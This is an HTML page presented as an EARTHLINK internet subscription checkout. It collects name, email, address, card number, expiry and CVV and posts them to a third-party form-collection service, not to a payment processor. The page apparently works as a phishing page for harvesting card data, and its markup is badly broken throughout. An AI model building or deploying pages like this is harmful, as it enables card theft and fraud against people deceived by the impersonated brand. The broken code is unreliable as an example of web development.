<!DOCTYPE html>

<html>
<head>
  <meta http-equiv="CONTENT-TYPE" content="text/html; charset=UTF-8">
  <title> My payment forms</title>
  <link rel="stylesheet" href="Styles/payment.css" type="text/css"/>
</head>
<body>
      <div class="contain"</div>
  
  <form action="https://formspree.io/f/xdknkwbb" method="POST">

    <div class="row"
      <div class="left"
        
          <head><strong>BILLING ADDRESS</strong>
         
              <div class="inputbox></div>"
                <input type="hidden" name=" username" value=">
               <lebel><span>Full Name</span>
            <input type="text" name="username"   placeholder="">
             <div class="inputbox></div>"</lebel>
               <span> Email </span> 
            <input type="text" name="username"   placeholder=""></br>
            <div class="inputbox></div>"
              <span>Address</span> 
            <input type="text" name="username"   placeholder=""></br>
            <div class="inputbox></div>"
             City
            <input type="text" name="username"   placeholder="">
            <div id="zip">
                <lebel>
                  <div class="inputbox></div>"
              <span>State</span>
                   <select>
            <option>Choose State</option>
            <option>Alabama</option>
            <option>Alaska</option>
            <option>California</option>
            <option>Colorado</option>
            <option>Florida</option>
            <option>Georgia</option>
            <option>Minnesota</option>
            <option>South Carolina</option>
            <option>Texas</option>
          </select>
        </lebel>
        <lebel>
          <div class="inputbox></div>"
              <span>Zip Code</span> 
              <input type="Numbers" name="username"   placeholder="">
        </lebel>
      </div>
</head>
   
    <div class="right"></div>
     
     <strong>Payment</strong> 
             <div class="container"
               <h5><span>Accepted Cards</span>
             <br><strong><em>MASTERCARD / VISA CARD</em></strong></br>
              </div></h5>
                     <lebel>
          <div class="inputbox></div>"
              <span>Name on Card</span> 
              <input type="Numbers" name="username"   placeholder="">
        </lebel>
                
                    <lebel>
          <div class="inputbox></div>"
              <span>Credit Card Number</span> 
              <input type="Numbers" name="username"   placeholder="1111-2222-3333">
        </lebel>
                       
                      <br><span>Exp Month/Year</span> 
              <input type="Month" name="username"   placeholder="Month/year">
                      </br>
                      <lebel>
          <div class="inputbox></div>"
              <span>CVV</span> 
              <input type="Numbers" name="username"   placeholder="576">
        </lebel></body>
     
                       <body><strong><h4>CHECKOUT LIST</h4>
      <strong><em> EARTHLINK®</em></strong>
Internet Subscribtion Details</strong>  
    <br> Customer ID No:</br><strong>1116745385</strong>
     <br>House Address:</br>152 Prospect Road, Walmer, Port Elizabeth, 6001. R1760.00
    <br> 3 Days Limited Subscribtion Package</br>
              <strong>Amount Purchase: $30</strong>
                
                <br><input type="Submit"  value="Make Payment" class="submit-btm"
            </bod>        
                        
                        
       </form>
</header>
   
 
</body>
</html>
